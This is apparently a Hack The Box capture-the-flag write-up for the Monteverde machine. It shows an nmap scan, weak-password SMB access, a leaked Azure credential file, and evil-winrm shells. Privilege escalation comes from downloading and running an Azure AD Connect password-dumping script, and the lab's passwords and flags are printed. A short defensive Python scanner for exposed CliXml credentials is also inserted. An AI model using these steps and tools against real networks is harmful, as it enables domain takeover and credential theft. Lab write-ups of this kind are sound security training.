└──╼ $sudo nmap -sV -sT -Pn -sC -O 10.10.10.172 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 05:27 BST
Nmap scan report for 10.10.10.172
Host is up (0.27s latency).
Not shown: 65516 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-04-20 03:55:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49775/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/20%Time=5E9D283E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -47m30s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-04-20T03:57:38
|_ start_date: N/A
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1206.98 seconds
After enumeration, we have a couple of usernames:
MEGABANK\Administrator
MEGABANK\krbtgt
MEGABANK\AAD_987d7f2f57d2
MEGABANK\mhope
MEGABANK\SABatchJobs
MEGABANK\svc-ata
MEGABANK\svc-bexec
MEGABANK\svc-netapp
MEGABANK\dgalanos
MEGABANK\roleary
MEGABANK\smorgan
I tried some ways to log in, and I was able to access SMB as SABatchJobs with the password being the same as the username.
┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient -U SABatchJobs -L \\10.10.10.172
Enter WORKGROUP\SABatchJobs's password:
Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
azure_uploads   Disk
C$              Disk      Default share
E$              Disk      Default share
IPC$            IPC       Remote IPC
NETLOGON        Disk      Logon server share
SYSVOL          Disk      Logon server share
users$          Disk
SMB1 disabled -- no workgroup available
We can see the user has access to the "users$" share.
┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $smbclient //10.10.10.172/users$ -U SABatchJobs
Enter WORKGROUP\SABatchJobs's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Fri Jan 3 13:12:48 2020
.. D 0 Fri Jan 3 13:12:48 2020
dgalanos D 0 Fri Jan 3 13:12:30 2020
mhope D 0 Fri Jan 3 13:41:18 2020
roleary D 0 Fri Jan 3 13:10:30 2020
smorgan D 0 Fri Jan 3 13:10:24 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> cd dgalanos
smb: \dgalanos\> dir
. D 0 Fri Jan 3 13:12:30 2020
.. D 0 Fri Jan 3 13:12:30 2020
524031 blocks of size 4096. 519955 blocks available
smb: \dgalanos\> cd ..
smb: \> dir mhope
mhope D 0 Fri Jan 3 13:41:18 2020
524031 blocks of size 4096. 519955 blocks available
smb: \> cd mhope
smb: \mhope\> dir
. D 0 Fri Jan 3 13:41:18 2020
.. D 0 Fri Jan 3 13:41:18 2020
azure.xml AR 1212 Fri Jan 3 13:40:23 2020
524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> type azure.xml
type: command not found
smb: \mhope\> more azure.xml
getting file \mhope\azure.xml of size 1212 as /tmp/smbmore.3eGmOU (1.0 KiloBytes/sec) (average 1.0 KiloBytes/sec)
"/tmp/smbmore.3eGmOU" may be a binary file. See it anyway?
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
smb: \mhope\> ^Z
[1]+ Stopped smbclient //10.10.10.172/users$ -U SABatchJobs
azure.xml:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
OK, now we have the password of user "mhope".
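As an added example (not part of this writeup, and not a tool the box or the author used), the following Python script parses PowerShell CliXml exports such as the azure.xml above and flags serialized credential objects or plaintext `Password`-style properties, so a defender can sweep user shares for files like this one. The sample document is constructed with a placeholder password; the namespace, element names and the PSADPasswordCredential type name follow the file shown above. The function names (`find_exposed_secrets`, `scan_directory`) are my own.

```python
"""Sweep PowerShell CliXml exports (Export-Clixml output) for serialized
credential objects and clear-text secret properties.

Added example for this writeup, not the author's code. The CliXml shape
(Objs/Obj/TN/T/Props/S with the 2004/04 PowerShell namespace) is the one
seen in the azure.xml above; the sample below is constructed with a
placeholder value.
"""
import os
import xml.etree.ElementTree as ET

CLIXML_NS = "http://schemas.microsoft.com/powershell/2004/04"
NS = {"ps": CLIXML_NS}

# Property names that count as a secret when stored as a plain <S> string.
SECRET_PROPS = {"password", "secret", "clientsecret", "pwd", "passphrase"}
# Type-name fragments of objects that normally carry credentials.
CREDENTIAL_TYPES = ("PasswordCredential", "PSCredential", "SecureString")

# Constructed sample: same layout as the writeup's azure.xml, placeholder password.
SAMPLE_CLIXML = """<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">PLACEHOLDER-not-a-real-secret</S>
    </Props>
  </Obj>
</Objs>"""


def find_exposed_secrets(clixml_text):
    """Return one finding per serialized object that is a credential type or
    carries a clear-text secret-looking property.

    A finding is {"ref": RefId, "types": [type names], "props": {name: note}};
    the note gives only the secret's length so the report itself leaks nothing.
    Raises ValueError if the text is not a CliXml document.
    """
    root = ET.fromstring(clixml_text)
    if root.tag != f"{{{CLIXML_NS}}}Objs":
        raise ValueError("not a PowerShell CliXml document")

    findings = []
    # iter() also visits nested <Obj> elements inside property values.
    for obj in root.iter(f"{{{CLIXML_NS}}}Obj"):
        types = [t.text or "" for t in obj.findall("ps:TN/ps:T", NS)]
        is_cred_type = any(frag in t for t in types for frag in CREDENTIAL_TYPES)
        suspicious = {}
        for s in obj.findall("ps:Props/ps:S", NS):
            name = s.get("N", "")
            value = (s.text or "").strip()
            if name.lower() in SECRET_PROPS and value:
                suspicious[name] = f"<redacted, {len(value)} chars>"
        if is_cred_type or suspicious:
            findings.append({"ref": obj.get("RefId"), "types": types, "props": suspicious})
    return findings


def scan_directory(path):
    """Walk a directory tree (e.g. a mounted users$ share) and return
    {file path: findings} for every .xml file that parses as CliXml and
    contains at least one finding. Non-CliXml or malformed files are skipped."""
    results = {}
    for dirpath, _dirs, files in os.walk(path):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8-sig", errors="replace") as fh:
                    found = find_exposed_secrets(fh.read())
            except (ET.ParseError, ValueError, OSError):
                continue
            if found:
                results[full] = found
    return results


if __name__ == "__main__":
    for f in find_exposed_secrets(SAMPLE_CLIXML):
        print(f"Obj {f['ref']}: {f['types'][0]} -> {f['props']}")
```

Point `scan_directory` at a copy of the share contents; each hit names the object type and which property held a clear-text value, without printing the value. The same check catches any `Export-Clixml` dump whose type name mentions `PSCredential`, which is the more common way such files appear on file servers.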
┌─[✗]─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> type ..\Desktop\user.txt
4961976bd7d8f4eeb2ce3705e2f212f2
*Evil-WinRM* PS C:\Users\mhope\Documents>
GETTING ROOT
*Evil-WinRM* PS C:\Users\mhope\Documents> cd C:\
*Evil-WinRM* PS C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
*Evil-WinRM* PS C:\>
After a few minutes of Google searching about MEGABANK\Azure Admins,
I found this vulnerability: https://blog.xpnsec.com/azuread-connect-for-redteam/
┌─[laladee@parrot]─[~/Downloads]
└──╼ $wget https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Azure-ADConnect.ps1
┌─[laladee@parrot]─[~/Downloads]
└──╼ $python -m SimpleHTTPServer 1337
┌─[✗]─[laladee@parrot]─[~]
└──╼ $evil-winrm -u mhope -p 4n0therD4y@n0th3r$ -i 10.10.10.172
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents> Invoke-WebRequest "http://10.10.14.81:1337/Azure-ADConnect.ps1" -OutFile "C:\Users\mhope\Desktop\Azure_meo.ps1"
*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir
Directory: C:\Users\mhope\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/19/2020 9:46 PM 1454 AzureAD-Connect.ps1
-a---- 4/19/2020 10:42 PM 2264 Azure_meo.ps1
-a---- 4/19/2020 9:40 PM 1453 Connect.ps1
-ar--- 1/3/2020 5:48 AM 32 user.txt
*Evil-WinRM* PS C:\Users\mhope\Desktop> import-module ./Azure_meo.ps1
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure_meo
The term 'Azure_meo' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1
+ Azure_meo
+ ~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Azure_meo:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
*Evil-WinRM* PS C:\Users\mhope\Desktop> Azure-ADConnect -server 127.0.0.1 -db ADSync
[+] Domain: MEGABANK.LOCAL
[+] Username: administrator
[+]Password: d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\mhope\Desktop> exit
┌─[laladee@parrot]─[~/Downloads]
└──╼ $evil-winrm -u Administrator -p d0m@in4dminyeah! -i 10.10.10.172
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
12909612d25c8dcf6e5a07d1a804a0bc
*Evil-WinRM* PS C:\Users\Administrator\Documents>